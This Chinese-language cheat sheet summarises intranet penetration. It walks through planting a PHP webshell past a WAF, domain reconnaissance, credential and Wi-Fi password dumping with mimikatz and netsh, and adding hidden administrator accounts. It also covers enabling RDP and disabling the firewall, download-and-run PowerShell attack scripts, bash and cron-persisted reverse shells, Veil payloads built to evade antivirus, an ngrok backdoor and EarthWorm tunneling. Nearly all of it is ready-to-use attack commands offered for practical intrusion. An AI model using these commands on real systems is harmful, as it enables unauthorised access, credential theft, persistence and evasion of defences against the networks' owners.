史上最强内网渗透知识点总结

获取 webshell 进内网

测试主站，搜 wooyun 历史洞未发现历史洞，github, svn, 目录扫描未发现敏感信息, 无域传送，端口只开了80端口，找到后台地址，想爆破后台，验证码后台验证，一次性，用 ocr 识别，找账号，通过 google，baidu，bing 等搜索，相关邮箱，域名等加常用密码组成字典，发现用户手册，找账号，发现未打码信息，和默认密码，试下登陆成功，找后台，上传有 dog，用含有一句话的 txt 文件

`<?php eval($_POST['cmd']);?>`

打包为 zip，php 文件

`<?php include 'phar://1.zip/1.txt';?>`

即可，c 刀被拦，修改 config.ini 文件

`php_make @eval(call_user_func_array(base64_decode,array($_POST[action])));`

用回调函数，第一个为函数名，二个为传的参数

前期信息收集

query user || qwinsta 查看当前在线用户

net user  查看本机用户

net user /domain 查看域用户

net view & net group "domain computers" /domain 查看当前域计算机列表 第二个查的更多

net view /domain 查看有几个域

net view \\\\dc   查看 dc 域内共享文件

net group /domain 查看域里面的组

net group "domain admins" /domain 查看域管

net localgroup administrators /domain   /这个也是查域管，是升级为域控时，本地账户也成为域管

net group "domain controllers" /domain 域控

net time /domain

net config workstation   当前登录域 - 计算机名 - 用户名

net use \\\\域控(如pc.xx.com) password /user:xxx.com\username 相当于这个帐号登录域内主机，可访问资源

ipconfig

systeminfo

tasklist /svc

tasklist /S ip /U domain\username /P /V 查看远程计算机 tasklist

net localgroup administrators && whoami 查看当前是不是属于管理组

netstat -ano

nltest /dclist:xx  查看域控

whoami /all 查看 Mandatory Label uac 级别和 sid 号

net sessoin 查看远程连接 session (需要管理权限)

net share     共享目录

cmdkey /l   查看保存登陆凭证

echo %logonserver%  查看登陆域

spn –l administrator spn 记录

set  环境变量

dsquery server - 查找目录中的 AD DC/LDS 实例

dsquery user - 查找目录中的用户

dsquery computer 查询所有计算机名称 windows 2003

dir /s *.exe 查找指定目录下及子目录下没隐藏文件

arp -a

发现远程登录密码等密码 netpass.exe  下载地址：

https://www.nirsoft.net/utils/network_password_recovery.html获取 window vpn 密码：

mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit  wifi 密码：

netsh wlan show profile 查处 wifi 名

netsh wlan show profile WiFi-name key=clear 获取对应 wifi 的密码ie 代理

reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternet

Settings" /v ProxyServer

reg query "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings"pac 代理

reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternet

Settings" /v AutoConfigURL   //引子 t0stmailpowershell-nishang

https://github.com/samratashok/nishang

其他常用命令

ping       icmp 连通性

nslookup www.baidu.com vps-ip dns 连通性

dig @vps-ip www.baidu.com

curl vps:8080  http 连通性

tracert

bitsadmin /transfer n http://ip/xx.exe C:\windows\temp\x.exe一种上传文件 >= 2008

fuser -nv tcp 80 查看端口 pid

rdesktop -u username ip linux 连接 win 远程桌面 (有可能不成功)

where file win 查找文件是否存在

找路径，Linux 下使用命令 find -name *.jsp 来查找，Windows 下，使用 for /r c:\windows\temp\ %i in (file lsss.dmp) do @echo %i

netstat -apn | grep 8888   kill -9 PID   查看端口并 kill

远程登录内网主机

判断是内网，还是外网，内网转发到 vps

netstat -ano   没有开启 3389 端口,复查下

tasklist /svc,查 svchost.exe 对应的 TermService 的 pid,看 netstat 相等的 pid 即 3389 端口.

在主机上添加账号

net user admin1 admin1 /add & net localgroup administrators admin1 /add

如不允许远程连接，修改注册表

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f

如果系统未配置过远程桌面服务，第一次开启时还需要添加防火墙规则，允许 3389 端口，命令如下:

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

关闭防火墙

netsh firewall set opmode mode=disable

3389user 无法添加:

http://www.91ri.org/5866.html

**隐藏 win 账户**

开启 sys 权限 cmd:

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-TokenManipulation.ps1');Invoke-TokenManipulation -CreateProcess 'cmd.exe' -Username 'nt authority\system'

add user 并隐藏:

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/3gstudent/Windows-User-Clone/master/Windows-User-Clone.ps1')

win server 有密码强度要求，改为更复杂密码即可:

渗透技巧——Windows 系统的帐户隐藏

https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%B8%90%E6%88%B7%E9%9A%90%E8%97%8F/

windows 的 RDP 连接记录:

http://rcoil.me/2018/05/%E5%85%B3%E4%BA%8Ewindows%E7%9A%84RDP%E8%BF%9E%E6%8E%A5%E8%AE%B0%E5%BD%95/

linux bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

`bash -i` 交互的 shell

`&` 标准错误输出到标准输出

`/dev/tcp/10.0.0.1/8080` 建立 socket ip port

`0>&1` 标准输入到标准输出

(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/IP/port;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -

猥琐版

(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/IP/PORT;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for whoami%100c\n")|crontab -

详细介绍

https://github.com/tom0li/security_circle/blob/master/15288418585142.md

ngrok-backdoor

Grok-backdoor 是一个简单的基于 python 的后门，它使用 Ngrok 隧道进行通信。Ngrok 后门可以使用 Pyinstaller 生成 windows，linux 和 mac 二进制文件。

虽然免杀，但如果开 win 防火墙会提示，生成后门时会询问是否捆绑 ngrok，选择 no 时，在被攻击机执行时需联网下载 ngrok，运行后，telnet 连接即可.

https://github.com/deepzec/Grok-backdoor

veil

这里，安装问题有点多，我用 kali-2018-32 安装成功，先安装下列依赖，后按照官方即可。

apt-get install libncurses5*

apt-get install libavutil55*

apt-get install gcc-mingw-w64*

apt-get install wine32

生成shell

./Veil.py

use 1

use c/meterpreter/rev_tcp

在 win 用 mingw 下 gcc 编译 bypass 360

gcc -o v.exe v.c -lws2_32

使用之前生成的 veil.rc

msfconsole -r veil.rc

一句话开启 http 服务，虚拟机里开启，在外访问虚拟机 ip 即可下载虚拟机文件：

`python -m SimpleHTTPServer 80`

ew

tools:

http://rootkiter.com/EarthWorm

新版 tools：

http://rootkiter.com/Termite/

**正向：**

*被攻击机(跳板)：*

temp 目录下:

unzip ew.zip

file /sbin/init (查看 linux 位数)

chmod 755 ew_for_Linux

./ew_for_Linux -s ssocksd -l 9999 (侦听 0.0.0.0:9999)